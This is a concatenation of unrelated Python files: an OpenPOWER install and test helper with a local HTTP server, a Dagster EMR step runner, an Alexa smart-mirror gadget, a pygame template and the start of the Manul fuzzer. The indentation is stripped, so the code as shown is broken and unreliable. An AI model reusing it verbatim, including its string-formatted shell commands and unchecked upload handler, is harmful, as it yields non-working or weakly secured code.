noconfig_exception = UnexpectedCase(state="assign_ip_petitboot config", message=my_msg)
raise noconfig_exception
cmd = ("ip addr|grep -B1 -i %s |grep BROADCAST|awk -F ':' '{print $2}'" % (self.conf.args.host_mac))
log.debug("ip addr cmd={}".format(cmd, type(cmd)))
iface = self.cv_SYSTEM.console.run_command(cmd, retry=5)
log.debug("iface={} type={} len={}".format(iface, type(iface), len(iface)))
if len(iface) >= 1:
iface = self.cv_SYSTEM.console.run_command(cmd)[0].strip()
else:
my_msg = ("We did NOT get interface back from query, UNABLE to proceed with trying to "
"setup the IP, check that Petitboot or Host OS is configured properly.")
noface_exception = UnexpectedCase(state="assign_ip_petitboot interface", message=my_msg)
raise noface_exception
cmd = ("ifconfig %s %s netmask %s" % (iface, self.cv_HOST.ip, self.conf.args.host_submask))
log.debug("ifconfig cmd={}".format(cmd))
self.cv_SYSTEM.console.run_command(cmd, retry=5)
cmd = ("route add default gateway %s" % self.conf.args.host_gateway)
log.debug("route cmd={}".format(cmd))
self.cv_SYSTEM.console.run_command_ignore_fail(cmd)
cmd = ("echo 'nameserver %s' > /etc/resolv.conf" % self.conf.args.host_dns)
log.debug("nameserver cmd={}".format(cmd))
self.cv_SYSTEM.console.run_command(cmd, retry=5)
def configure_host_ip(self):
self.wait_for_network()
# Check if ip is assigned in petitboot
try:
self.ping_network()
except CommandFailed as cf:
log.debug("configure_host_ip CommandFailed={}".format(cf))
try:
self.assign_ip_petitboot()
self.ping_network()
except Exception as e:
log.debug("configure_host_ip Exception={}".format(e))
my_msg = "We failed to setup Petitboot or Host IP, check that the IP's are configured and any other configuration parms"
noconfig_exception = UnexpectedCase(state="configure_host_ip", message=my_msg)
raise noconfig_exception
def get_server_ip(self):
"""
Get IP of server where test runs
"""
my_ip = ""
try:
self.configure_host_ip()
except Exception as e:
my_msg = "Exception trying configure_host_ip, e={}".format(e)
configure_exception = UnexpectedCase(state="get_server_ip", message=my_msg)
raise configure_exception
retry = 30
while retry > 0:
try:
my_ip = self.cv_SYSTEM.get_my_ip_from_host_perspective()
log.debug("get_server_ip my_ip={}".format(my_ip))
if not my_ip:
my_msg = "We were not able to get IP from Petitboot or Host, check that the IP is configured"
noip_exception = UnexpectedCase(state="get_server_ip", message=my_msg)
raise noip_exception
output = self.cv_SYSTEM.console.run_command("ping {} -c 1".format(my_ip), retry=5)
log.debug("get_server_ip output={}".format(output))
break
except CommandFailed as cf:
log.debug("get_server_ip CommandFailed cf={}".format(cf))
if cf.exitcode == 1:
time.sleep(1)
retry = retry - 1
pass
else:
log.debug("get_server_ip Exception={}".format(cf))
raise cf
return my_ip
def get_uploaded_file(self, name):
return uploaded_files.get(name)
def start_server(self, server_ip):
"""
Start local http server
"""
HOST, PORT = "0.0.0.0", 0
global REPO
self.server = ThreadedHTTPServer((HOST, PORT), ThreadedHTTPHandler)
ip, port = self.server.server_address
if not REPO:
REPO = "http://%s:%s/repo" % (server_ip, port)
print("# Listening on %s:%s" % (ip, port))
server_thread = threading.Thread(target=self.server.serve_forever)
server_thread.daemon = True
server_thread.start()
print("# Server running in thread:", server_thread.name)
return port
def stop_server(self):
"""
Stops local http server
"""
self.server.shutdown()
self.server.server_close()
return
def setup_repo(self, cdrom):
"""
Sets up repo from given cdrom.
Check if given cdrom is url or file
if url, download in the BASE_PATH and
mount to repo folder
:params cdrom: OS cdrom path local or remote
"""
repo_path = os.path.join(BASE_PATH, 'repo')
abs_repo_path = os.path.abspath(repo_path)
# Clear already mount repo
if os.path.ismount(repo_path):
status, output = commands.getstatusoutput("umount %s" % abs_repo_path)
if status != 0:
print("failed to unmount", abs_repo_path)
return ""
elif os.path.isdir(repo_path):
shutil.rmtree(repo_path)
else:
pass
if not os.path.isdir(repo_path):
os.makedirs(abs_repo_path)
if os.path.isfile(cdrom):
cdrom_path = cdrom
else:
cdrom_url = urllib2.urlopen(cdrom)
if not cdrom_url:
print("Unknown cdrom path %s" % cdrom)
return ""
with open(os.path.join(BASE_PATH, "iso"), 'wb') as f:
f.write(cdrom_url.read())
cdrom_path = os.path.join(BASE_PATH, "iso")
cmd = "mount -t iso9660 -o loop %s %s" % (cdrom_path, abs_repo_path)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print("Failed to mount iso %s on %s\n %s", (cdrom, abs_repo_path,
output))
return ""
return abs_repo_path
def extract_install_files(self, repo_path):
"""
extract the install file from given repo path
:params repo_path: os repo path either local or remote
"""
vmlinux_src = os.path.join(repo_path, BOOTPATH, VMLINUX)
initrd_src = os.path.join(repo_path, BOOTPATH, INITRD)
vmlinux_dst = os.path.join(BASE_PATH, VMLINUX)
initrd_dst = os.path.join(BASE_PATH, INITRD)
# let us make sure, no old vmlinux, initrd
if os.path.isfile(vmlinux_dst):
os.remove(vmlinux_dst)
if os.path.isfile(initrd_dst):
os.remove(initrd_dst)
if os.path.isdir(repo_path):
try:
shutil.copyfile(vmlinux_src, vmlinux_dst)
shutil.copyfile(initrd_src, initrd_dst)
except Exception:
return False
else:
vmlinux_file = urllib2.urlopen(vmlinux_src)
initrd_file = urllib2.urlopen(initrd_src)
if not (vmlinux_file and initrd_file):
print("Unknown repo path %s, %s" % (vmlinux_src, initrd_src))
return False
try:
with open(vmlinux_dst, 'wb') as f:
f.write(vmlinux_file.read())
with open(initrd_dst, 'wb') as f:
f.write(initrd_file.read())
except Exception:
return False
return True
def set_bootable_disk(self, disk):
"""
Sets the given disk as default bootable entry in petitboot
"""
self.cv_SYSTEM.sys_set_bootdev_no_override()
# FIXME: wait till the device(disk) discovery in petitboot
time.sleep(60)
cmd = 'blkid %s*' % disk
output = self.cv_SYSTEM.console.run_command(cmd)
uuid = output[0].split(':')[1].split('=')[1].replace("\"", "")
cmd = 'nvram --update-config "auto-boot?=true"'
output = self.cv_SYSTEM.console.run_command(cmd)
cmd = 'nvram --update-config petitboot,bootdevs=uuid:%s' % uuid
output = self.cv_SYSTEM.console.run_command(cmd)
cmd = 'nvram --print-config'
output = self.cv_SYSTEM.console.run_command(cmd)
return
def get_boot_cfg(self):
"""
Find bootloader cfg file path of host.
:return: bootloader cfg file path, empty string if no cfg file found.
"""
con = self.cv_SYSTEM.cv_HOST.get_ssh_connection()
bootloader_cfg = [
'/boot/grub/grub.conf',
'/boot/grub2/grub.cfg',
'/etc/grub.conf',
'/etc/grub2.cfg',
'/boot/etc/yaboot.conf',
'/etc/default/grub'
]
cfg_path = ''
for path in bootloader_cfg:
cmd = "test -f %s" % path
try:
con.run_command(cmd)
cfg_path = path
except CommandFailed:
continue
return cfg_path
def check_kernel_cmdline(self, args="", remove_args=""):
"""
Check which of the given args are missing from /proc/cmdline and which of
remove_args are present in it.
:param args: arguments that should be present (added later if missing)
:param remove_args: arguments that should be absent (removed later if present)
:return: arguments still to be added and to be removed, as two strings
"""
req_args = ""
req_remove_args = ""
check_cmd = "cat /proc/cmdline"
con = self.cv_SYSTEM.cv_HOST.get_ssh_connection()
try:
check_output = con.run_command(check_cmd, timeout=60)[0].split()
for each_arg in args.split():
if each_arg not in check_output:
req_args += "%s " % each_arg
for each_arg in remove_args.split():
if each_arg in check_output:
req_remove_args += "%s " % each_arg
except CommandFailed as Err:
print("Failed to get kernel commandline using %s: %s" %
(Err.command, Err.output))
return req_args.strip(), req_remove_args.strip()
def update_kernel_cmdline(self, args="", remove_args="", reboot=True):
"""
Update default Kernel cmdline arguments
:param args: Kernel option to be included
:param remove_args: Kernel option to be removed
:param reboot: whether to reboot the host or not
:return: True on success and False on failure
"""
con = self.cv_SYSTEM.cv_HOST.get_ssh_connection()
req_args, req_remove_args = self.check_kernel_cmdline(args,
remove_args)
try:
con.run_command("grubby --help", timeout=60)
cmd = 'grubby --update-kernel=`grubby --default-kernel` '
if req_args:
cmd += '--args="%s" ' % req_args
if req_remove_args:
cmd += '--remove-args="%s"' % req_remove_args
try:
con.run_command(cmd)
except CommandFailed as Err:
print("Failed to update kernel commandline using %s: %s" %
(Err.command, Err.output))
return False
# If grubby is not available fallback by changing grub file
except CommandFailed:
grub_key = "GRUB_CMDLINE_LINUX_DEFAULT"
boot_cfg = self.get_boot_cfg()
cmd = ("cat %s | grep %s | awk -F '=' '{print $2}'" %
(boot_cfg, grub_key))
try:
output = con.run_command(cmd, timeout=60)[0].strip("\"")
if req_args:
output += " %s" % req_args
if req_remove_args:
for each_arg in req_remove_args.split():
output = output.strip(each_arg).strip()
except CommandFailed as Err:
print("Failed to get the kernel commandline - %s: %s" %
(Err.command, Err.output))
return False
if req_args or req_remove_args:
try:
cmd = "sed -i 's/%s=.*/%s=\"%s\"/g' %s" % (grub_key, grub_key,
output, boot_cfg)
con.run_command(cmd, timeout=60)
con.run_command("update-grub")
except CommandFailed as Err:
print("Failed to update kernel commandline - %s: %s" %
(Err.command, Err.output))
return False
if reboot and (req_args or req_remove_args):
# Reboot the host for the kernel command to reflect
self.cv_SYSTEM.goto_state(OpSystemState.OFF)
self.cv_SYSTEM.goto_state(OpSystemState.OS)
# check for added/removed args in /proc/cmdline
req_args, req_remove_args = self.check_kernel_cmdline(args,
remove_args)
if req_args:
print("Failed to add arg %s in the cmdline %s" %
(args, output))
return False
if req_remove_args:
print("Failed to remove arg %s in the cmdline %s" %
(remove_args, output))
return False
return True
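# Hypothetical usage sketch (not part of this module): given an InstallUtil instance `util`,
# adding and removing kernel parameters could look like
#   util.update_kernel_cmdline(args="hugepagesz=16G", remove_args="quiet", reboot=True)
# which returns True once /proc/cmdline reflects the change after the reboot.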
class ThreadedHTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_HEAD(self):
# FIXME: The local repo is unable to handle http requests during installation.
# Avoid using the cdrom if your kickstart file needs the repo; if the installation
# just needs vmlinux and initrd from the cdrom, the cdrom can still be used.
if "repo" in self.path:
self.path = BASE_PATH + self.path
f = self.send_head()
if f:
f.close()
else:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
def do_GET(self):
if "repo" in self.path:
self.path = BASE_PATH + self.path
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
else:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
print("# Webserver was asked for: ", self.path)
if self.path == "/%s" % VMLINUX:
f = open("%s/%s" % (BASE_PATH, VMLINUX), "r")
d = f.read()
self.wfile.write(d)
f.close()
return
elif self.path == "/%s" % INITRD:
f = open("%s/%s" % (BASE_PATH, INITRD), "r")
d = f.read()
self.wfile.write(d)
f.close()
return
elif self.path == "/%s" % KS:
f = open("%s/%s" % (BASE_PATH, KS), "r")
d = f.read()
if "hostos" in BASE_PATH:
ps = d.format(REPO, PROXY, PASSWORD, DISK, DISK, DISK)
elif "rhel" in BASE_PATH:
ps = d.format(REPO, PROXY, PASSWORD, DISK, DISK, DISK)
elif "ubuntu" in BASE_PATH:
user = USERNAME
if user == 'root':
user = 'ubuntu'
packages = "openssh-server build-essential lvm2 ethtool "
packages+= "nfs-common ssh ksh lsvpd nfs-kernel-server iprutils procinfo "
packages+= "sg3-utils lsscsi libaio-dev libtime-hires-perl "
packages+= "acpid tgt openjdk-8* zip git automake python "
packages+= "expect gcc g++ gdb "
packages+= "python-dev p7zip python-stevedore python-setuptools "
packages+= "libvirt-dev numactl libosinfo-1.0-0 python-pip "
packages+= "linux-tools-common linux-tools-generic lm-sensors "
packages+= "ipmitool i2c-tools pciutils opal-prd opal-utils "
packages+= "device-tree-compiler fwts stress"
ps = d.format("openpower", "example.com",
PROXY, PASSWORD, PASSWORD, user, PASSWORD, PASSWORD, DISK, packages)
else:
print("unknown distro")
self.wfile.write(ps)
return
else:
self.send_response(404)
return
def do_POST(self):
path = os.path.normpath(self.path)
path = path[1:]
path_elements = path.split('/')
print("INCOMING")
print(repr(path))
print(repr(path_elements))
if path_elements[0] != "upload":
return
form = cgi.FieldStorage(
fp = self.rfile,
headers = self.headers,
environ={ "REQUEST_METHOD": "POST",
"CONTENT_TYPE": self.headers['Content-Type']})
uploaded_files[form["file"].filename] = form["file"].value
self.wfile.write("Success")
class ThreadedHTTPServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
pass
|
emr_step_main.py
|
import io
import os
import pickle
import sys
import time
from queue import Empty, Queue
from threading import Thread
import boto3
from dagster_aws.s3.file_manager import S3FileHandle, S3FileManager
from dagster.core.execution.plan.external_step import PICKLED_EVENTS_FILE_NAME, run_step_from_ref
DONE = object()
def main(step_run_ref_bucket, s3_dir_key):
session = boto3.client("s3")
file_manager = S3FileManager(session, step_run_ref_bucket, "")
file_handle = S3FileHandle(step_run_ref_bucket, s3_dir_key)
step_run_ref_data = file_manager.read_data(file_handle)
step_run_ref = pickle.loads(step_run_ref_data)
events_bucket = step_run_ref_bucket
events_s3_key = os.path.dirname(s3_dir_key) + "/" + PICKLED_EVENTS_FILE_NAME
def put_events(events):
file_obj = io.BytesIO(pickle.dumps(events))
session.put_object(Body=file_obj, Bucket=events_bucket, Key=events_s3_key)
# Set up a thread to handle writing events back to the plan process, so execution doesn't get
# blocked on remote communication
events_queue = Queue()
event_writing_thread = Thread(
target=event_writing_loop, kwargs=dict(events_queue=events_queue, put_events_fn=put_events),
)
event_writing_thread.start()
try:
for event in run_step_from_ref(step_run_ref):
events_queue.put(event)
finally:
events_queue.put(DONE)
event_writing_thread.join()
def event_writing_loop(events_queue, put_events_fn):
"""
Periodically check whether the step has posted any new events to the queue. If they have,
write ALL events (not just the new events) to an S3 bucket.
This approach was motivated by a few challenges:
* We can't expect a process on EMR to be able to hit an endpoint in the plan process, because
the plan process might be behind someone's home internet.
* We can't expect the plan process to be able to hit an endpoint in the process on EMR, because
EMR is often behind a VPC.
* S3 is eventually consistent and doesn't support appends
"""
all_events = []
done = False
got_new_events = False
time_posted_last_batch = time.time()
while not done:
try:
event_or_done = events_queue.get(timeout=1)
if event_or_done == DONE:
done = True
else:
all_events.append(event_or_done)
got_new_events = True
except Empty:
pass
enough_time_between_batches = time.time() - time_posted_last_batch > 1
if got_new_events and (done or enough_time_between_batches):
put_events_fn(all_events)
got_new_events = False
time_posted_last_batch = time.time()
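# A minimal local sketch of how the loop batches events (illustrative only; the names
# below are hypothetical and not part of this module):
#   q = Queue()
#   batches = []
#   t = Thread(target=event_writing_loop, kwargs=dict(events_queue=q, put_events_fn=batches.append))
#   t.start(); q.put("event-1"); q.put(DONE); t.join()
#   assert batches[-1] == ["event-1"]   # the full (cumulative) list is re-posted each time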
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2])
|
agt_smart_mirror.py
|
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# These materials are licensed under the Amazon Software License in connection with the Alexa Gadgets Program.
# The Agreement is available at https://aws.amazon.com/asl/.
# See the Agreement for the specific terms and conditions of the Agreement.
# Capitalized terms not defined in this file have the meanings given to them in the Agreement.
#
import json
import logging
import sys
import threading
import time
from enum import Enum
from datetime import datetime
import dateutil.parser
import traceback
import webcolors
import board
import neopixel
from agt import AlexaGadget
from smart_mirror import SmartMirror
from parameter_store_helper import fetch_and_store_parameters, get_parameters, SmartMirrorConfig
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger(__name__)
class Actions(Enum):
Off = 0
Rainbow = 1
Breathe = 2
ShowColor = 3
Clock = 4
Timer = 5
Police = 6
class SmartMirrorGadget(AlexaGadget):
"""
An Alexa Gadget for your simple smart mirror.
"""
def __init__(self):
super().__init__()
self.config = self.get_parameters()
self.smart_mirror = SmartMirror(self.config)
# This sets which action is started when the mirror starts
self.defaultAction = Actions.Clock
self.currentAction = self.defaultAction
self.lastAction = self.defaultAction
# Boolean that tells the loop if it should execute actions or not - default is True which means that the configured default action (self.defaultAction)
# will be used
self.keep_cycling = True
#default options for show color as a reference
self.showColorOptions = {
'color': webcolors.name_to_rgb('yellow')
}
#default options for timer
self.showTimerOptions = {
'startTime': None,
'endTime': None,
'color': webcolors.name_to_rgb('red'),
'timer_token': None
}
# Setup a lock to be used for avoiding race conditions
# during color animation state updates
self.lock = threading.Lock()
self.loop_thread = threading.Thread(target=self.loop)
self.loop_thread.start()
def get_parameters(self):
"""
Gets the parameters from parameter store
"""
try:
fetch_and_store_parameters()
parameters = get_parameters()
return SmartMirrorConfig(parameters)
except:
return SmartMirrorConfig({})
def startAction(self, action):
"""
Call this function to start a specific action
"""
logger.info(f'Starting Action {action}')
self.lock.acquire()
self.lastAction = self.currentAction
self.currentAction = action
self.keep_cycling = True
self.lock.release()
def stopAction(self):
"""
Call this action to end the current action - turn all LEDs off
"""
self.lock.acquire()
self.lastAction = Actions.Off
self.currentAction = Actions.Off
self.keep_cycling = False
self.lock.release()
def loop(self):
"""
Main function of this class. This is an endless loop running in a separate thread. It will check what action to run on each iteration.
"""
while True:
# Check if anything should be visualized
if self.keep_cycling:
logger.info(f'{self.currentAction} is on')
try:
if self.currentAction == Actions.Off:
time.sleep(0.1)
if self.currentAction == Actions.Rainbow:
self.smart_mirror.rainbow_cycle(0.001)
if self.currentAction == Actions.Breathe:
self.smart_mirror.breathe()
if self.currentAction == Actions.Police:
self.smart_mirror.police()
if self.currentAction == Actions.Clock:
self.smart_mirror.clock()
if self.currentAction == Actions.ShowColor:
self.smart_mirror.showColor(
self.showColorOptions['color'])
if self.currentAction == Actions.Timer:
timerPosition = self.getCurrentTimerPosition()
if(timerPosition != 0):
self.smart_mirror.showRange(0, timerPosition, 0.1, self.showTimerOptions['color'])
else:
self.smart_mirror.showColor(self.showTimerOptions['color'])
except Exception as e:
logger.info(f'Error in loop: {e}')
logger.error(f'Stack: {traceback.format_exc()}')
time.sleep(0.1)
else:
logger.info('Nothing is on')
self.smart_mirror.reset()
time.sleep(0.1)
def on_alexa_gadget_statelistener_stateupdate(self, directive):
"""
This will trigger when your connected Alexa device changes state. Here we listen for the device reacting to you saying "Alexa..." or "Echo..."
"""
for state in directive.payload.states:
if state.name == 'wakeword':
if state.value == 'active':
logger.info('Wake word active')
self.showColorOptions['color'] = webcolors.name_to_rgb('yellow')
self.startAction(Actions.ShowColor)
elif state.value == 'cleared':
logger.info('Wake word cleared')
self.startAction(self.lastAction)
def on_alerts_setalert(self, directive):
"""
Handles setting of alerts on your connected Alexa device e.g. "Alexa set timer for 60 seconds"
"""
if directive.payload.type != 'TIMER':
logger.info(
"Received SetAlert directive but type != TIMER. Ignorning")
return
endTime = dateutil.parser.parse(directive.payload.scheduledTime).timestamp()
now = time.time()
if endTime <= now:
logger.info(
"Received SetAlert directive but scheduledTime has already passed. Ignoring")
return
if self.showTimerOptions['timer_token'] == directive.payload.token:
logger.info(
"Received SetAlert directive to update to currently running timer. Adjusting")
self.showTimerOptions['endTime'] = endTime
return
if self.currentAction == Actions.Timer:
logger.info(
"Received SetAlert directive but another timer is already running. Ignoring")
return
logger.info("Received SetAlert directive. Starting a timer. " +
str(int(endTime - now)) + " seconds left..")
self.showTimerOptions['endTime'] = endTime
self.showTimerOptions['startTime'] = now
self.showTimerOptions['timer_token'] = directive.payload.token
self.showTimerOptions['color'] = webcolors.name_to_rgb('red')
self.startAction(Actions.Timer)
def on_alerts_deletealert(self, directive):
"""
Handles deletion of alert - reverts back to default action
"""
self.startAction(self.defaultAction)
def getCurrentTimerPosition(self):
"""
Figure out how many LEDs should be turned on. If the timer is up, all 60 LEDs should be lit.
"""
start_time = self.showTimerOptions['startTime']
logger.info("start_time " + str(start_time) + " in timer") # Log stuff
end_time = self.showTimerOptions['endTime']
logger.info("end_time " + str(end_time) + " in timer") # Log stuff
current_time = time.time()
logger.info("current_time " + str(current_time) +
" in timer") # Log stuff
timer_total = int(end_time - start_time)
logger.info("timer_total " + str(timer_total) +
" in timer") # Log stuff
timer_left = int(max(0, end_time - current_time))
logger.info("timer_left " + str(timer_left) + " in timer") # Log stuff
if timer_left > 0:
nextPosition = int((timer_total - timer_left)/timer_total * self.config.LedCount)
logger.info("Next position " + str(nextPosition) +
" in timer") # Log stuff
logger.info("LedCount/Modulo:" +
str(self.config.LedCount)) # Log stuff
time.sleep(1)
return nextPosition # Light up the leds
else:
return 0
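# Worked example (illustrative): for a 60 second timer with 45 seconds left and a 60-LED
# ring (config.LedCount == 60), int((60 - 45) / 60 * 60) == 15 LEDs are lit.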
# this matches the namespace that the skill adds in the payload (see lambda_function.py): (namespace='Custom.SmartMirror', name='Rainbow'),
def on_custom_smartmirror_rainbow(self, directive):
"""
Handles Custom.SmartMirror.Rainbow directive
"""
logger.info('show rainbow directive called')
self.startAction(Actions.Rainbow)
# this matches the namespace that the skill adds in the payload (see lambda_function.py): (namespace='Custom.SmartMirror', name='Color'),
def on_custom_smartmirror_color(self, directive):
"""
Handles Custom.SmartMirror.Color directive
"""
payload = json.loads(directive.payload.decode("utf-8"))
color = payload['color'].lower() #this is the color name coming in from Alexa
rgb = webcolors.name_to_rgb(color)
logger.info(f'show color directive called with color {color} => {rgb}')
self.showColorOptions['color'] = rgb
self.startAction(Actions.ShowColor)
# this matches the namespace that the skill adds in the payload (see lambda_function.py): (namespace='Custom.SmartMirror', name='Clock'),
def on_custom_smartmirror_clock(self, directive):
"""
Handles Custom.SmartMirror.Clock directive
"""
logger.info('show clock directive called')
self.startAction(Actions.Clock)
def on_custom_smartmirror_police(self, directive):
"""
Handles Custom.SmartMirror.Police directive
"""
logger.info('Blink like the Police')
self.startAction(Actions.Police)
def on_custom_smartmirror_stopled(self, directive):
"""
Handles Custom.ColorCyclerGadget.StopLED directive sent from skill
by stopping the LED animations
"""
logger.info('StopLED directive received: Turning off LED')
self.stopAction()
def reset(self):
"""
Turn off all LEDs by calling the reset function
"""
try:
self.smart_mirror.reset()
except:
print('failed to reset')
if __name__ == '__main__':
gadget = SmartMirrorGadget()
try:
gadget.main()
finally:
gadget.reset()
|
template.py
|
import pygame, pygcurse
from pygame.locals import *
# import LED_display as LD
# import threading
import time
import copy
import os
import sys
delay = 0.1
#t=threading.Thread(target=LD.main, args=())
#t.setDaemon(True)
#t.start()
iScreen =[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]
# - Pygcurse board
win = pygcurse.PygcurseWindow(32, 16, fullscreen=False)
def main():
os.system('cls' if os.name == 'nt' else 'clear')
i = 0
j = 0
while True:
oScreen = copy.deepcopy(iScreen)
win.fill('@', fgcolor='black', bgcolor='black')
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
# fill matrix
# - Change oScreen matrix output in this area
#ex)
j += 1
if j == 32:
i += 1
j = 0
if i == 16:
i = 0
oScreen[i][j] = 1
# - Draw Matrix
consoleMatrix(oScreen)
pygcurseMatrix(oScreen)
# drawMatrix(oScreen)
time.sleep(delay)
os.system('cls' if os.name == 'nt' else 'clear')
def consoleMatrix(screen):
for i in screen:
print(i)
def pygcurseMatrix(screen):
for i in range(16):
for j in range(32):
if screen[i][j] == 1:
win.putchar('@', j, i, 'white')
elif screen[i][j] == 2:
win.putchar('@', j, i, 'green')
#default color = 'white', 'yellow' ,'fuchsia' ,'red', 'silver', 'gray', 'olive', 'purple', 'maroon', 'aqua', 'lime', 'teal', 'green', 'blue', 'navy', 'black'
win.update()
#def drawMatrix(array):
# for x in range(len(array[0])):
# for y in range(len(array)):
# if array[y][x] == 0:
# LD.set_pixel(x, y, 0)
# elif array[y][x] == 1:
# LD.set_pixel(x, y, 2)
# elif array[y][x] == 2:
# LD.set_pixel(x, y, 7)
# elif array[y][x] == 3:
# LD.set_pixel(x, y, 1)
# else:
# continue
if __name__ == '__main__':
main()
|
manul.py
|
# Manul - main module
# -------------------------------------
# Maksim Shudrak <mshudrak@salesforce.com> <mxmssh@gmail.com>
#
# Copyright 2019 Salesforce.com, inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os import listdir
from os.path import isfile, join
import shutil
from ctypes import *
import multiprocessing
import argparse
from timeit import default_timer as timer
import ntpath
from printing import *
from manul_utils import *
from manul_win_utils import *
import manul_network
import random
import afl_fuzz
import zlib
import importlib
import dbi_mode
import radamsa
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
xrange = range
else:
string_types = basestring,
xrange = xrange
import subprocess, threading
import signal
net_process_is_up = None
net_sleep_between_cases = 0
INIT_WAIT_TIME = 0
class ForkServer(object):
def __init__(self, timeout):
self.control = os.pipe()
self.status = os.pipe()
self.r_fd = None
self.timeout = timeout
def init_forkserver(self, cmd):
processid = os.fork()
if processid:
# This is the parent process
time.sleep(INIT_WAIT_TIME)
self.r_fd = os.fdopen(self.status[0], 'rb')
res = self.r_fd.read(4)
if len(res) != 4:
ERROR("Failed to init forkserver")
INFO(0, bcolors.OKGREEN, None, "Forkserver init completed successfully")
else:
# This is the child process
os.dup2(self.control[0], 198)
os.dup2(self.status[1], 199)
null_fds = [os.open(os.devnull, os.O_RDWR) for x in xrange(2)]
# put /dev/null fds on 1 and 2
os.dup2(null_fds[0], 1)
os.dup2(null_fds[1], 2)
cmd = cmd.split()
# TODO: we need to close some fds before we actually start execv
# more details: https://lcamtuf.blogspot.com/2014/10/fuzzing-binaries-without-execve.html
os.execv(cmd[0], cmd[0:])
ERROR("Failed to start the target using forkserver")
sys.exit(0) # this shouldn't happen
def run_via_forkserver(self):
# TODO: timeouts for read/write otherwise we can wait infinitely
res = os.write(self.control[1], b"go_!") # ask forkserver to fork
if res != 4:
ERROR("Failed to communicate with forkserver (run_via_forkserver, write). Unable to send go command")
fork_pid = self.r_fd.read(4)
if len(fork_pid) != 4:
ERROR("Failed to communicate with forkserver (run_via_forkserver, read). Unable to confirm fork")
status = self.r_fd.read(4) # TODO: we need timeout here because our target can go idle
if len(status) != 4:
ERROR("Failed to communicate with forkserver (run_via_forkserver, read). Unable to retrieve child status")
return bytes_to_int(status)
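# Note on the handshake above (descriptive, based on the AFL forkserver convention):
# the child dups the control pipe to fd 198 and the status pipe to fd 199 before execv;
# the parent requests a run by writing 4 bytes to the control pipe, then reads 4 bytes
# (the forked child's pid) followed by 4 bytes (its exit status) from the status pipe.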
class Command(object):
def __init__(self, target_ip, target_port, target_protocol, timeout, forkserver_on, dbi_persistence_handler,
dbi_persistence_mode):
self.process = None
self.forkserver_on = forkserver_on
self.forkserver_is_up = False
self.forkserver = None
self.returncode = 0
if self.forkserver_on:
self.forkserver = ForkServer(timeout)
self.out = None
self.err = None
self.timeout = timeout
if target_ip:
self.target_ip = target_ip
self.target_port = int(target_port)
self.target_protocol = target_protocol
